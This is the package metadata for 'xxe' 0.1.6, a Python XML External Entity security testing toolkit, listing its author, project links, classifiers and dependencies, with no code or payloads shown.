Metadata-Version: 2.2
Name: xxe
Version: 0.1.6
Summary: A comprehensive XML External Entity (XXE) security testing toolkit
Home-page: https://github.com/ishanoshada/xxe
Author: Ishan Oshada
Author-email: ishan.kodithuwakku.offical@gmail.com
Project-URL: Bug Tracker, https://github.com/ishanoshada/xxe/issues
Project-URL: Documentation, https://xxe.readthedocs.io/
Project-URL: Source Code, https://github.com/ishanoshada/xxe
Keywords: security,penetration-testing,xml,xxe,security-testing,vulnerability-scanner,ethical-hacking,xml-security
Platform: any
Classifier: Development Status :: 4 - Beta
Classifier: Intended Audience :: Developers
Classifier: Intended Audience :: Information Technology
Classifier: Intended Audience :: System Administrators
Classifier: Topic :: Security
Classifier: Topic :: Software Development :: Testing
Classifier: Topic :: Software Development :: Libraries :: Python Modules
Classifier: License :: OSI Approved :: MIT License
Classifier: Programming Language :: Python :: 3
Classifier: Programming Language :: Python :: 3.7
Classifier: Programming Language :: Python :: 3.8
Classifier: Programming Language :: Python :: 3.9
Classifier: Programming Language :: Python :: 3.10
Classifier: Programming Language :: Python :: 3.11
Classifier: Operating System :: OS Independent
Classifier: Environment :: Console
Requires-Dist: requests>=2.25.0
Requires-Dist: urllib3>=1.26.0
Requires-Dist: lxml>=4.9.0
Requires-Dist: defusedxml>=0.7.1
Requires-Dist: python-dateutil>=2.8.2
Dynamic: author
Dynamic: author-email
Dynamic: classifier
Dynamic: description
Dynamic: description-content-type
Dynamic: home-page
Dynamic: keywords
Dynamic: platform
Dynamic: project-url
Dynamic: requires-dist
Dynamic: summary
